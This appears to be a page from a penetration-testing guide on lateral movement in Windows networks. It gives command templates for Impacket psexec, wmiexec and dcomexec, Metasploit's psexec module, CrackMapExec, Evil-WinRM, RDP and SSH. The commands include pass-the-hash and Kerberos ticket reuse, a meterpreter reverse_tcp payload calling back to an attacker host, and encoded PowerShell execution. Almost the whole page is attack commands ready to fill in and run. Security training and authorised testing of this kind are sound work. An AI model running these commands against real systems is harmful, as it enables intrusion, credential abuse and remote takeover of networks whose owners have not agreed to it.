This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Remote Execution Techniques

Windows Remote Execution Services

Service Purpose: Various Windows services enable remote command execution for administrative purposes, which can be abused for lateral movement.

Remote Execution Methods

PSExec-style Execution

Using Impacket PSExec

# SMB-based remote execution
python3 psexec.py <domain>/<username>:<password>@<target-IP>
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Kerberos authentication
export KRB5CCNAME=<ticket.ccache>
python3 psexec.py <domain>/<username>@<target-IP> -k -no-pass

Using Metasploit PSExec

use exploit/windows/smb/psexec
set RHOSTS <target-IP>
set SMBUser <username>
set SMBPass <password>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker-IP>
run

WMI-based Execution

Using Impacket WMIExec

# WMI remote execution (more stealthy)
python3 wmiexec.py <domain>/<username>:<password>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Semi-interactive shell
python3 wmiexec.py <domain>/<username>:<password>@<target-IP>

Using CrackMapExec WMI

# WMI command execution
crackmapexec wmi <target-IP> -u '<username>' -p '<password>' -x "whoami"
crackmapexec wmi <target-IP> -u '<username>' -H <NTLM-hash> -x "powershell -enc <base64-command>"

DCOM-based Execution

Using Impacket DCOMExec

# DCOM remote execution
python3 dcomexec.py <domain>/<username>:<password>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Specify DCOM object
python3 dcomexec.py <domain>/<username>:<password>@<target-IP> -object MMC20

WinRM-based Execution

Using Evil-WinRM

# Windows Remote Management
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i <target-IP> -u <username> -H <NTLM-hash>

# File upload/download capabilities
upload <local-file> <remote-path>
download <remote-file> <local-path>

Using CrackMapExec WinRM

# WinRM authentication testing
crackmapexec winrm <target-IP> -u '<username>' -p '<password>'
crackmapexec winrm <target-IP> -u '<username>' -H <NTLM-hash>

Service-Specific Remote Execution

RDP-based Access

# Remote Desktop Protocol
rdesktop <target-IP> -u <username> -p <password>
xfreerdp /v:<target-IP> /u:<username> /p:<password>

# RDP with pass-the-hash (requires specific tools)
# Note: Standard RDP doesn't support PtH directly

SSH-based Access (Windows OpenSSH)

# If OpenSSH is installed on Windows target
ssh <username>@<target-IP>
scp <file> <username>@<target-IP>:/path/
PreviousPass-the-?NextLiving off the Land (LotL)

Last updated

Was this helpful?